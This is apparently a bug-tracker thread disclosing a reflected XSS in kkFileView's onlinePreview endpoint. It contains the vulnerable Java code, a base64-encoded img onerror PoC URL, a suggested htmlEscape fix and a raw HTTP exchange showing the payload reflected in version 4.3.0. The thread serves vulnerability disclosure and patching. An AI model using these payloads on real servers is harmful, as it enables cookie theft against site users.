Another kkFileView XSS Vulnerability

[absolutyy]

问题描述Description kkFileview v4.1.0存在另一处XSS漏洞，可能导致网站cookies泄露。

kkFileview v4.1.0 has another XSS vulnerability, which may lead to the leakage of website cookies.

漏洞位置vulerable code location kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java文件61行，errorMsg参数用户可控，传输到错误提示处理函数中处理后用于前端错误提示，整个流程未对errorMsg参数进行过滤处理

The vulnerability code is located at line 61 in kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java , The errorMsg parameter is user-controllable. After being transferred to the error prompt processing function for processing, it is used for the front-end error prompt, and the errorMsg parameter is not filtered throughout the process

    public String onlinePreview(String url, Model model, HttpServletRequest req) {
        String fileUrl;
        try {
            fileUrl = WebUtils.decodeBase64String(url);
        } catch (Exception ex) {
            String errorMsg = String.format(BASE64_DECODE_ERROR_MSG, "url");
            return otherFilePreview.notSupportedFile(model, errorMsg);
        }
        FileAttribute fileAttribute = fileHandlerService.getFileAttribute(fileUrl, req);
        model.addAttribute("file", fileAttribute);
        FilePreview filePreview = previewFactory.get(fileAttribute);
        logger.info("预览文件url：{}，previewType：{}", fileUrl, fileAttribute.getType());
        return filePreview.filePreviewHandle(fileUrl, model, fileAttribute);
    }

漏洞证明PoC 官方演示站点为最新4.1.0版本，以此为演示，访问漏洞位置（url参数值需要经过base64编码和url编码）: https://file.keking.cn/onlinePreview?url=aHR0cHM6Ly93d3cuYmFpZHUuPGltZyBzcmM9MSBvbmVycm9yPWFsZXJ0KDEpPg==

The version of official demo site is v4.1.0. Visit https://file.keking.cn/onlinePreview?url=aHR0cHM6Ly93d3cuYmFpZHUuPGltZyBzcmM9MSBvbmVycm9yPWFsZXJ0KDEpPg== and the concept is proofed. (The url parameter value needs to be base64 encoded and url encoded.)

[gaoxingzaq]

\server\src\main\java\cn\keking\service\impl\OtherFilePreviewImpl 修改 public String notSupportedFile(Model model, String fileType, String errMsg) { fileType= HtmlUtils.htmlEscape(fileType); errMsg= HtmlUtils.htmlEscape(errMsg); model.addAttribute("fileType", fileType); model.addAttribute("msg", errMsg); return NOT_SUPPORTED_FILE_PAGE; }

[edyang]

4.3.0 版本还是存在！

#################### 请求数据包

GET /onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1DQw== HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Host: 10.63.130.39:30033

#################### 返回数据包

HTTP/1.1 200 OK
Date: Mon, 27 May 2024 08:26:02 GMT
Content-Length: 1058

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <style type="text/css">
        body {
            margin: 0 auto;
            width: 900px;
            background-color: #CCB;
        }

        .container {
            width: 700px;
            height: 700px;
            margin: 0 auto;
        }

        img {
            width: auto;
            height: auto;
            max-width: 100%;
            max-height: 100%;
            padding-bottom: 36px;
        }

        p {
            display: block;
            font-size: 20px;
            color: blue;
        }
    </style>
</head>
<body>
<div class="container">
    <img src="images/sorry.jpg" />
    <p>
        预览源文件来自不受信任的站点：<span style="color: red; display: inline;">www.google.<img src=1 onerror=alert(document.domain)>=cc</span> 请联系管理员！<br>
        有任何疑问，请加入kk开源社区知识星球咨询：<a href="https://t.zsxq.com/09ZHSXbsQ">https://t.zsxq.com/09ZHSXbsQ</a><br>
    </p>
</div>
</body>
</html>